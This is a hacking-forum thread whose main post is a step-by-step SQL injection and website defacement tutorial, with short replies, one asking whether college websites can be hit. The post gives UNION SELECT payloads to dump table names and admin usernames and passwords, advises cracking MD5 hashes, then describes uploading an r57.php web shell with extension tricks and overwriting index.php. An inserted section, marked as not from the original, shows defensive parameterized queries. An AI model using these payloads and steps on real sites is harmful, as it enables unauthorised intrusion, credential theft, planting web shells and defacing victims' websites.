[DEFACING/SQLI] SQLI TUTORIAL

Post by FalsePromises »

SQLI TUTORIAL (c) Mr.M of GSH

1. First you need to find a vulnerable website.

[Please login or register to view this link]

2. Now you need to find columns.

[Please login or register to view this link] order by 1-- ( no error )
[Please login or register to view this link] order by 2-- ( no error )
[Please login or register to view this link] order by 3-- ( no error )
[Please login or register to view this link] order by 4-- ( no error )
[Please login or register to view this link] order by 5-- ( no error )
[Please login or register to view this link] order by 6-- ( error )

Errors look like this:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''39' at line 1
database query failure- SELECT * FROM texecom_sidemenu WHERE id='39

3. Now select columns
There are 5 columns

[Please login or register to view this link] UNION ALL SELECT 1,2,3,4,5--

4. Finding version.
So if you do not get one of the bold numbers 1, 2, 3, 4, you will try them all.
I choose 1

[Please login or register to view this link] UNION ALL SELECT @@version,2,3,4,5--

You get the version like this:
5.0.32-Debian_7etch11-log

5. Finding Tables
[Please login or register to view this link] UNION ALL SELECT table_name,2,3,4,5 from information_schema.tables--
And you will get tables like this:
PRODUCTS, ADMINS, and others
So there must be a table by name: admin, users, user, login, client.

6. Finding Columns in the Table ADMINS.

[Please login or register to view this link] UNION ALL SELECT column_name,2,3,4,5 from information_schema.columns where table_name=char()--

We found the ADMINS table; now go to an ASCII website and convert ADMINS.
You will get this: ADMINS
Remove and replace ; with ,
Like this: 65,68,77,73,78,83
You put table_name=char(65,68,77,73,78,83)--

[Please login or register to view this link] UNION ALL SELECT column_name,2,3,4,5 from information_schema.columns where table_name=char(65,68,77,73,78,83)--

And you will get the columns in table ADMINS.
There need to be columns with names: username and password

7. Getting username and password.

Now we put concat(username,0x3a,password) and admins

[Please login or register to view this link] UNION ALL SELECT concat(username,0x3a,password),2,3,4,5 from admins--

( 0x3a is ASCII )

8. Found username and password
So you found the username and password.
If the password is a hash like this: 2510c39011c5be704182423e3a695e91
you will need to use MD5 Hash Online Crackers.
If the password is not a hash you are lucky and now you need to find the admin panel.

9. Finding Admin Panel

Open the tool Admin Finder
Put the website in below and click Scan.
So you found the admin panel and it looks like this [Please login or register to view this link]

You open the website and it has Username: Password:
Put in the username and password that you got.
Done, you are logged in to the Admin Panel; let's upload a shell and deface.

10. Uploading Shell and Add Deface

In the Admin Panel you will search categories or anything where you can upload a file or picture.
When you have found it, you will download a shell from the website I told you about before starting the tutorial, so you will try to upload your shell like: r57.php. When you upload it you will see the link of the upload and open it like this:

[Please login or register to view this link]

If you can't upload r57.php change it to r57.jpg.php or r57.txt and try!

You need to make a deface page in HTML and put it on the website.
So you open the shell, you will find a file index.php and click on it, and there you will remove the PHP code from index and put your HTML code.

Congratulations, you defaced the website.
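
Added example, not part of the original post: the error quoted in step 2 shows the request value being pasted into the SQL text and the failing query echoed back to the visitor. The sketch below contrasts that pattern with a bound parameter and a generic failure path; the in-memory SQLite table, its column layout, the sample inputs and all function names are assumptions made for illustration.

```python
import sqlite3

def make_db():
    # Constructed stand-in for the table named in the quoted error message;
    # the five-column layout and the row are assumptions for this example.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE texecom_sidemenu (id INTEGER, a, b, c, title)")
    db.execute("INSERT INTO texecom_sidemenu VALUES (39, 'x', 'y', 'z', 'Products')")
    return db

def lookup_concatenated(db, raw_id):
    """'Before' pattern: the request value is pasted into the SQL text and the
    failing query is echoed back to the visitor, as in the error quoted above."""
    sql = "SELECT * FROM texecom_sidemenu WHERE id='" + raw_id + "'"
    try:
        return db.execute(sql).fetchall()
    except sqlite3.Error as exc:
        return "database query failure- %s (%s)" % (sql, exc)

def lookup_parameterized(db, raw_id):
    """Hardened: allowlist the input type, bind the value, keep errors server-side."""
    if not (raw_id.isascii() and raw_id.isdigit() and len(raw_id) <= 9):
        return []  # not a plausible id: behave exactly like "no such row"
    try:
        return db.execute(
            "SELECT * FROM texecom_sidemenu WHERE id = ?", (int(raw_id),)
        ).fetchall()
    except sqlite3.Error:
        return []  # record the detail in server logs, never in the response

# Constructed request values: a normal id, the stray quote behind the quoted
# error, and the column-count probes from step 2 of the post.
SAMPLE_INPUTS = ["39", "39'", "39' order by 5-- ", "39' order by 6-- "]

def compare(db):
    """Return (input, concatenated result, parameterized result) per sample."""
    return [(v, lookup_concatenated(db, v), lookup_parameterized(db, v))
            for v in SAMPLE_INPUTS]

if __name__ == "__main__":
    for value, before, after in compare(make_db()):
        print(repr(value), "| concatenated:", before, "| parameterized:", after)
```

The concatenated version answers the two `order by` values differently and leaks the table name in its error text, which is the signal steps 2 onward depend on; the parameterized version returns the same empty result for every non-numeric input.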

Post by FalsePromises »

For comments or violent reactions, kindly pm me or comment.

Post by FalsePromises »

So I can edit this post and add those things you suggest :) Thanks :D

Post by cbokyan »

Thank you.

Post by FalsePromises »

You're welcome :D
FalsePromises AT YOUR SERVICE!

Post by Unknown User »

:lol! For points ...

Post by mac_maharot »

Thanks, up

Post by MhengMheng17 »

Bro, can I ask a question? Can this tutorial also be used with HackBar? On Android. Sorry, I'm a newbie. I also want to learn this. Thanks in advance, bro.

Post by Hachi »

college websites can?

Post by N4M3L3S5 »

Up!